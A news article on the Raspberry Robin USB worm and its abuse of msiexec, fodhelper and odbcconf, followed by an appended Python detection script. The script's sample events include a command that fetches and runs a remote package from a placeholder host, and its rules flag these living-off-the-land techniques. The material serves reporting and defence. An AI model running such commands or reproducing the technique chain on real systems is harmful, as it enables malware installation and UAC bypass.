Warning about Raspberry Robin malware that threatens Windows

Written By Eleman

Microsoft has announced that it has found a malware called ‘Raspberry Robin’ on the networks of hundreds of organizations from different industries. The giant company described this software as ‘high risk’ and warned users.

With the increasing use of the Internet, billions of people now spend most of their day online. However, it is a known fact that the cyber world has some frightening aspects. Every day, we hear that malicious actors are launching cyber attacks or that defenses are being built against them.

Now, a warning about such an issue has come from the US-based Microsoft, one of the largest technology companies in the world. The giant company has made statements about a high-risk piece of malware, described as a ‘worm’, that infects hundreds of corporate Windows networks.

Microsoft Announces Finding ‘High-Risk’ Malware Infecting Hundreds of Windows Devices

It is stated that this malware is named ‘Raspberry Robin’ and spreads via USB devices containing a ‘.LNK’ file. According to the descriptions, the worm starts an msiexec.exe process via ‘Command Prompt’ and launches another malicious file. Raspberry Robin then communicates with its command-and-control servers via a short URL, and if the connection succeeds, it downloads and installs a number of other malicious DLLs.

It should be noted that Raspberry Robin is not new malware; it was first noticed by cybersecurity experts in 2021. In addition, Microsoft states that it has seen evidence that this software was in use as early as 2019.

According to a Bleeping Computer report, the giant company has started warning Defender for Endpoint subscribers about the dangers posed by Raspberry Robin, and stated that hundreds of organizations in multiple industries have encountered the worm on their Windows networks.

New Raspberry Robin worm utilizes Windows Installer to drop malware

Red Canary intelligence analysts have found a new Windows malware with worm capabilities that spreads using external USB drives.

This malware is linked to a cluster of malicious activity named Raspberry Robin and was first seen in September 2021 (cybersecurity firm Sekoia tracks the same malware as the “QNAP worm”).

Red Canary’s Detection Engineering team identified the worm in several customers’ networks, some in the technology and manufacturing sectors.

Raspberry Robin spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is connected.

Once connected, the worm spawns a new process using cmd.exe to launch a malicious file stored on the infected drive.

Legitimate Windows tools abused to install malware

It uses the Microsoft Standard Installer (msiexec.exe) to contact its command-and-control (C2) servers, likely hosted on compromised QNAP devices and using TOR exit nodes as additional C2 infrastructure.

“While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware,” the researchers said.

“Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”

While they have not yet determined whether it establishes persistence, or by which methods, they suspect that the malware installs a malicious DLL file [1, 2] on compromised machines to survive removal between restarts.

Raspberry Robin launches this DLL with the help of two other legitimate Windows utilities: fodhelper (a trusted binary for managing features in Windows settings) and odbcconf (a tool for configuring ODBC drivers).

The first allows it to bypass User Account Control (UAC), while the second helps it execute and configure the DLL.
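A defender-side way to turn the chain described in this article (cmd.exe started from a USB .LNK, msiexec.exe reaching out to a URL, and fodhelper/odbcconf handling a DLL) into process-creation checks, written here as an added example and not code from Microsoft, Red Canary or the article. The event field names and the sample events are constructed assumptions loosely modelled on Sysmon process-creation records, and the caller supplies which drive letters count as removable.

```python
import re

# Constructed sample process-creation events (not real telemetry).
# Field names are an assumption; paths, drive letter and URL are made up.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /r "E:\update.lnk"'},                 # USB .LNK stage
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "msiexec /q /i http://example.invalid/pkg"},    # C2 contact stage
    {"image": r"C:\Windows\System32\odbcconf.exe",
     "parent": r"C:\Windows\System32\fodhelper.exe",
     "cmdline": r"odbcconf.exe C:\Users\Public\lib.dll"},      # DLL stage
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'msiexec /i "C:\Installers\tool.msi"'},       # benign local install
]

URL_RE = re.compile(r"https?://\S+", re.I)
DRIVE_RE = re.compile(r"\b([A-Z]):\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def removable_lnk_launch(ev, removable_drives):
    """cmd.exe started with a path on a removable drive (the USB .LNK stage)."""
    if basename(ev["image"]) != "cmd.exe":
        return False
    drives = {d.upper() for d in DRIVE_RE.findall(ev["cmdline"])}
    return bool(drives & {d.upper() for d in removable_drives})


def msiexec_remote_package(ev):
    """msiexec.exe handed a URL instead of a local package (the C2 contact stage)."""
    return basename(ev["image"]) == "msiexec.exe" and bool(URL_RE.search(ev["cmdline"]))


def lolbin_dll_chain(ev):
    """odbcconf.exe given a DLL, or any process spawned by fodhelper.exe."""
    img, parent = basename(ev["image"]), basename(ev["parent"])
    return parent == "fodhelper.exe" or (img == "odbcconf.exe" and ".dll" in ev["cmdline"].lower())


def scan(events, removable_drives=("E",)):
    """Return (rule name, command line) for every event that matches a rule."""
    rules = (("removable_lnk_launch", lambda ev: removable_lnk_launch(ev, removable_drives)),
             ("msiexec_remote_package", msiexec_remote_package),
             ("lolbin_dll_chain", lolbin_dll_chain))
    return [(name, ev["cmdline"]) for ev in events for name, rule in rules if rule(ev)]
```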
